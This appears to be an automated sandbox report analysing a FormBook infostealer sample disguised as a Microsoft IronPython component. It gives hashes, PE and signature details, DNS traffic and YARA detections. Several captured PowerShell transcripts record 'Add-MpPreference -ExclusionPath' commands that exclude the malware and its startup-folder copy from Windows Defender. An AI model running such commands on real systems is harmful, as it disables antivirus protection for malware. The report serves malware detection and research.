                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085354..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\2FDD6624\svchost.exe -Force..Process ID: 7148..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085354..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\2FDD6624\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085635..Username: computer\user..RunAs User: D
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.7GV4I+P8.20210915085342.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5795
                                                                                      Entropy (8bit):5.409079834213978
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZw/UN07qDo1ZLrZW/UN07qDo1Z14S+SQSjZl/UN07qDo1Z75SASASCZJ:f
                                                                                      MD5:A395452A3C4DE84F92428C18162077E7
                                                                                      SHA1:A8A67EA53D2F1F1287168AC81EF0C583649E4416
                                                                                      SHA-256:174121A08CA779D3F66BB4129D035FC30AC0F5B5B5A7C4094CA3C9925361F515
                                                                                      SHA-512:02E36402F0D9766BCF87EE7D2C5F990205DD8D89263CD0D49455389CE57252D8C615B322ED36271B18FA43CBB0DA55476B99DA63ED2116FABC59A750ADA8F692
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085344..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..Process ID: 6832..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085344..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085557..Username: computer\user..RunAs User: computer\a
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.8wRRpIo6.20210915085354.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5795
                                                                                      Entropy (8bit):5.40547114401758
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZM/UN0cqDo1Z7rZy/UN0cqDo1ZD4S+SQSjZSZ/UN0cqDo1ZIV5SASASxZF:IXa
                                                                                      MD5:1813264A77217E25811AE401F2185BFE
                                                                                      SHA1:641C7EB694ECFFD9FA59A91E802310E9619A98FB
                                                                                      SHA-256:7D2BEF101006D302949D6718C7A45654A3F6395EAC9BEDBF1697943C29740681
                                                                                      SHA-512:D8F498DD81019706F13EF0CAFEE06A62DA4B773A40E98C41211C1B4C751469E83FF1CFE2B09F0ADFDF6E534E9D5A9A401A2195F6E36586425273A5C93B3C31BF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085357..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..Process ID: 1140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085357..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085614..Username: computer\user..RunAs User: computer\a
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.M0A9nFrO.20210915085339.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3800
                                                                                      Entropy (8bit):5.343744764805817
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZj/UN7rqDo1ZLLPZl/UN7rqDo1Z+qVA0cA0cA07TZ9q:G00a/q
                                                                                      MD5:02909BE5AF30B0F46FFD9F8F6E6CC25F
                                                                                      SHA1:A59E77F85B70EA86061FBE4E7D108D094704622D
                                                                                      SHA-256:09063EB87A3D6DDD9456C8C93C7E9476671CF8D3BDBB0240ADDD800B5ED4D4E4
                                                                                      SHA-512:7002D9D37E6F09FF9E67889768B0664505152542FEA9F8E0E090D03705FD25A39C298826BCF3060335E208F1BDB549D37AE36A0DA3C364B39D3B1EF7521562A4
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085341..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..Process ID: 6688..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085341..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..**********************..Command start time: 2021
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.ZxpJrQlW.20210915085337.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3800
                                                                                      Entropy (8bit):5.34238914176191
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZY/UN7BqDo1ZIuPZy/UN7BqDo1ZuqVA0cA0cA0tZe3:00073
                                                                                      MD5:78D3C659E3AC7494B537B37B9C2D9FD5
                                                                                      SHA1:307DA7A6C778F11C1655963B81DA9CF4C859DC17
                                                                                      SHA-256:6AE4A1A1EF55D5206D75AD361929A3212D5854B26AA4964F2EAFE098900E63E9
                                                                                      SHA-512:E0212E41F18448A3E2BEE8323D4C82A114FB362482AF73F901847FAA8000D6B1C51106005713B9F81D4334C7653799FE9C087E5BB6CEDC66AEB3E75EF30FC8AE
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085339..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..Process ID: 6512..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085339..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..**********************..Command start time: 2021
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.p8kQh6Fk.20210915085438.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3800
                                                                                      Entropy (8bit):5.340557632367787
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZQ/UN7rtqDo1Zc3PZ1/UN7rtqDo1ZEqVA0cA0cA0dZm:000J
                                                                                      MD5:E626BF866DBC5D68A6DAF266E3908A40
                                                                                      SHA1:E245BCE7E1F23B835D1247AC2622ECB62443DBAC
                                                                                      SHA-256:9CBC11190B035DCD0227351583ED83AA458E0CD9DD0E2D5C9EC6E14671AB2FCE
                                                                                      SHA-512:E3A4A450AC490C7554E500AC898344ED16D3C47B15665E43DD101B2B8A6FBC09050FE20CC70185D93F52AD94BD5577C6559A4C6CC27CD7D417958668901C4872
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085443..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..Process ID: 5052..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085443..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..**********************..Command start time: 2021
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.v0+taG7v.20210915085331.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5795
                                                                                      Entropy (8bit):5.408658522522741
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZh/UN0kqDo1Z+rZB/UN0kqDo1Z+4S+SQSjZV/UN0kqDo1Z75SASASfZX:T
                                                                                      MD5:1CA0A29BCCAEBC272168654F51689E9C
                                                                                      SHA1:96ABDE5269C473F9B2582338B543D778ED1FF593
                                                                                      SHA-256:DE7F21FBBC1DAC9244E03C73592FBC09215C6C1FD41E706AFCC90787BBCC6E0C
                                                                                      SHA-512:E415AEF9A0F5118DFF2E77DBA079688C2FF9EF16A91422A23D8B27E625D1515639FD5A66908179E06B4444111608E5E9129F096A32EA3F7E26D7EE3E63012250
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085332..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..Process ID: 6260..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085332..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085743..Username: computer\user..RunAs User: computer\a
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.vQHTUbYb.20210915085333.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5795
                                                                                      Entropy (8bit):5.409254768401486
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZE/UN0WqDo1ZTrZ4/UN0WqDo1Ze4S+SQSjZ9/UN0WqDo1ZG5SASASebZQ:Z
                                                                                      MD5:ED04B63AA54BBEABC392FE57DE5D1007
                                                                                      SHA1:2F911BE11314D54FFAAD710672AA086A6B0BB331
                                                                                      SHA-256:DE1574984A7578934F21CD7D9CBF22C09E608E6432542F400CEE2E675B387EE5
                                                                                      SHA-512:B1954748CB4197C2672078971B6071D473418C8F0D3E317B767ACA865E73E217AF04BF6D44BCC6129641D315B3AE676585831573C9FE47EA2D9413BA8B2EE52D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085335..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..Process ID: 6392..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085335..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085652..Username: computer\user..RunAs User: computer\a
                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):55
                                                                                      Entropy (8bit):4.306461250274409
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):6.324012336357782
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:RYhdmjjr94.exe
                                                                                      File size:1053624
                                                                                      MD5:44696d252000850d3ea71d9ae238aedc
                                                                                      SHA1:1fb61a1df500f9025641526cb4013d555b129a84
                                                                                      SHA256:1b39d6bf218028dfe7bc8254a3b1682804e9bf05b8298c708c318236f64ad986
                                                                                      SHA512:e1115a0a70b6d532633c1c60733a2aebbdc9e14863deaec7f6e15604c20f9f3ce3d36132ec2b814a4c774b25a6c4c8ccad4003724b98abead2be3f752b9d6314
                                                                                      SSDEEP:12288:M1VPzxljWH+fdg8yXresMdJFBwA48ayWMWPX6+Pqpn7PJuhgqCakBu7:yzxljW+g3Xub48ayWlK+ipnLJuhVkA7
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..............0.................. ... ....@.. .......................`............`................................

                                                                                      File Icon

                                                                                      Icon Hash:00828e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x5012ce
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                      Time Stamp:0x5E8F89C0 [Thu Apr 9 20:46:56 2020 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Authenticode Signature

                                                                                      Signature Valid:false
                                                                                      Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                      Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                                                                                      Error Number:-2146762495
                                                                                      Not Before, Not After
                                                                                      • 7/7/2021 5:00:00 PM 7/8/2022 4:59:59 PM
                                                                                      Subject Chain
                                                                                      • CN=Afia Wave Enterprises Oy, O=Afia Wave Enterprises Oy, L=Helsinki, S=Uusimaa, C=FI
                                                                                      Version:3
                                                                                      Thumbprint MD5:4D53204310277C51FA444D3365AA03EB
                                                                                      Thumbprint SHA-1:9B6F3B3CD33AE938FBC5C95B8C9239BAC9F9F7BF
                                                                                      Thumbprint SHA-256:999BBF99F3B3C1A894340918D8F2C6A358E7EC6299BAB5D8FD6B9E7570ABF929
                                                                                      Serial:69AD1E8B5941C93D5017B7C3FDB8E7B6

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1012040x4a.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1020000x544.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xffe000x15b8
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1040000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x10124e0x1c.text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000xff2d40xff400False0.536390104677data6.31812419802IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x1020000x5440x600False0.350260416667data3.72045311112IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x1040000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_GROUP_ICON0x1020a00x6data
                                                                                      RT_VERSION0x1020a80x49adata

                                                                                      Imports

                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Version Infos

                                                                                      DescriptionData
                                                                                      Translation0x0000 0x04b0
                                                                                      LegalCopyright Microsoft Corporation
                                                                                      Assembly Version16.0.0.0
                                                                                      InternalNameMicrosoft.PythonTools.IronPython.dll
                                                                                      FileVersion16.6.20100.1
                                                                                      CompanyNameMicrosoft Corporation
                                                                                      CommentsProvides templates and integration for IronPython-based projects.
                                                                                      ProductNamePython support for Microsoft Visual Studio
                                                                                      ProductVersion16.6.20100.1
                                                                                      FileDescriptionVisual Studio - IronPython support
                                                                                      OriginalFilenameMicrosoft.PythonTools.IronPython.dll

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Sep 15, 2021 08:53:06.077810049 CEST6544753192.168.2.58.8.8.8
                                                                                      Sep 15, 2021 08:53:06.112370968 CEST53654478.8.8.8192.168.2.5
                                                                                      Sep 15, 2021 08:53:20.022248030 CEST5244153192.168.2.58.8.8.8
                                                                                      Sep 15, 2021 08:53:20.051691055 CEST53524418.8.8.8192.168.2.5
                                                                                      Sep 15, 2021 08:53:57.942164898 CEST6217653192.168.2.58.8.8.8
                                                                                      Sep 15, 2021 08:53:57.978177071 CEST53621768.8.8.8192.168.2.5
                                                                                      Sep 15, 2021 08:54:17.505590916 CEST5959653192.168.2.58.8.8.8
                                                                                      Sep 15, 2021 08:54:17.550008059 CEST53595968.8.8.8192.168.2.5
                                                                                      Sep 15, 2021 08:54:32.761794090 CEST6529653192.168.2.58.8.8.8
                                                                                      Sep 15, 2021 08:54:32.797377110 CEST53652968.8.8.8192.168.2.5
                                                                                      Sep 15, 2021 08:55:26.078685999 CEST6318353192.168.2.58.8.8.8
                                                                                      Sep 15, 2021 08:55:26.113998890 CEST53631838.8.8.8192.168.2.5
                                                                                      Sep 15, 2021 08:55:29.450730085 CEST6015153192.168.2.58.8.8.8
                                                                                      Sep 15, 2021 08:55:29.478764057 CEST53601518.8.8.8192.168.2.5
                                                                                      Sep 15, 2021 08:55:36.228642941 CEST5696953192.168.2.58.8.8.8
                                                                                      Sep 15, 2021 08:55:36.255779982 CEST53569698.8.8.8192.168.2.5
                                                                                      Sep 15, 2021 08:55:38.369191885 CEST5516153192.168.2.58.8.8.8
                                                                                      Sep 15, 2021 08:55:38.402147055 CEST53551618.8.8.8192.168.2.5

                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: RYhdmjjr94.exe PID: 4328 Parent PID: 5492

                                                                                      General

                                                                                      Start time:08:53:12
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\RYhdmjjr94.exe'
                                                                                      Imagebase:0x1e0000
                                                                                      File size:1053624 bytes
                                                                                      MD5 hash:44696D252000850D3EA71D9AE238AEDC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, Author: Joe Security
